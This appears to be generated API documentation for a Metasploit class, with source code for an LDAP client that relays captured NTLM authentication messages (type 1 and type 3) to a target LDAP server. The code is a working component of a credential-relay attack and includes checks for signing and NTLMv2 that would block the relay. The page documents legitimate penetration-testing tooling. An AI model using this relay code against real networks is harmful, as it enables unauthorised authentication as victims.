Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP::Client

Inherits:

Net::LDAP::Connection

Object
Net::LDAP::Connection
Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP::Client

show all

Defined in:: lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb

Overview

The LDAP Client for interacting with the relayed_target This isn’t actually a Rex::Proto::LDAP::Client instance, but rather a Net::LDAP::Connection instance because of the state requirements of the relay operations

Instance Attribute Summary collapse

#logger ⇒ Object readonly protected

Returns the value of attribute logger.
#target ⇒ Object readonly

Returns the value of attribute target.
#timeout ⇒ Object

Returns the value of attribute timeout.

Class Method Summary collapse

.create(provider, target, logger, timeout) ⇒ Object

Instance Method Summary collapse

#create_ldap_client ⇒ Rex::Proto::LDAP::Client

Instantiate a Rex::Proto::LDAP::Client that can be used as a normal LDAP client.
#initialize(server, provider: nil, target: nil, logger: nil, timeout: DefaultConnectTimeout) ⇒ Client constructor

A new instance of Client.
#relay_ntlmssp_type1(client_type1_msg) ⇒ Object
#relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Constructor Details

#initialize(server, provider: nil, target: nil, logger: nil, timeout: DefaultConnectTimeout) ⇒ `Client`

Returns a new instance of Client.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 11

def initialize(server, provider: nil, target: nil, logger: nil, timeout: DefaultConnectTimeout)
  @logger = logger
  @provider = provider
  @target = target
  @timeout = server[:connect_timeout] || timeout
  super(server)
end

Instance Attribute Details

#logger ⇒ `Object` (readonly, protected)

Returns the value of attribute logger.



97
98
99

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 97

def logger
  @logger
end

#target ⇒ `Object` (readonly)

Returns the value of attribute target.



9
10
11

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 9

def target
  @target
end

#timeout ⇒ `Object`

Returns the value of attribute timeout.



8
9
10

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 8

def timeout
  @timeout
end

Class Method Details

.create(provider, target, logger, timeout) ⇒ `Object`

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 19

def self.create(provider, target, logger, timeout)
  new(
    {
      host: target.ip,
      port: target.port,
      connect_timeout: timeout
    },
    provider: provider,
    target: target,
    logger: logger
  )
end

Instance Method Details

#create_ldap_client ⇒ `Rex::Proto::LDAP::Client`

Instantiate a Rex::Proto::LDAP::Client that can be used as a normal LDAP client. This is mainly used to setup an LDAP session.

Returns:

(Rex::Proto::LDAP::Client)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 84

def create_ldap_client
  client = Rex::Proto::LDAP::Client.new(
    host: @target.ip,
    port: @target.port,
    auth: { method: :rex_relay_ntlm },
    connect_timeout: @timeout
  )
  client.connection = self
  client
end

#relay_ntlmssp_type1(client_type1_msg) ⇒ `Object`

Parameters:

client_type1_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 36

def relay_ntlmssp_type1(client_type1_msg)
  ntlm_message = Net::NTLM::Message.parse(client_type1_msg)
  if ntlm_message.has_flag?(:SIGN)
    logger.print_warning('Relay client\'s NTLM type 1 message requests signing, relaying to LDAP will not work')
  end

  pdu = bind(method: :rex_relay_ntlm, ntlm_message: client_type1_msg)

  unless pdu.result_code == Net::LDAP::ResultCodeSaslBindInProgress
    return Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
      nt_status: WindowsError::NTStatus::STATUS_LOGON_FAILURE
    )
  end

  server_type2_message = pdu.result_server_sasl_creds.to_s

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.parse(server_type2_message),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end

#relay_ntlmssp_type3(client_type3_msg) ⇒ `Object`

Parameters:

client_type3_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/ldap/client.rb', line 60

def relay_ntlmssp_type3(client_type3_msg)
  ntlm_message = Net::NTLM::Message.parse(client_type3_msg)
  if ntlm_message.ntlm_version == :ntlmv2
    logger.print_warning('Relay client\'s NTLM type 3 message is NTLMv2, relaying to LDAP will not work')
  end

  pdu = bind(method: :rex_relay_ntlm, ntlm_message: client_type3_msg)

  case pdu.result_code
  when Net::LDAP::ResultCodeSuccess
    nt_status = WindowsError::NTStatus::STATUS_SUCCESS
  when Net::LDAP::ResultCodeInvalidCredentials
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  else
    return nil
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end

Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::LDAP::Client

Overview

Instance Attribute Summary collapse

Class Method Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(server, provider: nil, target: nil, logger: nil, timeout: DefaultConnectTimeout) ⇒ Client

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

#target ⇒ Object (readonly)

#timeout ⇒ Object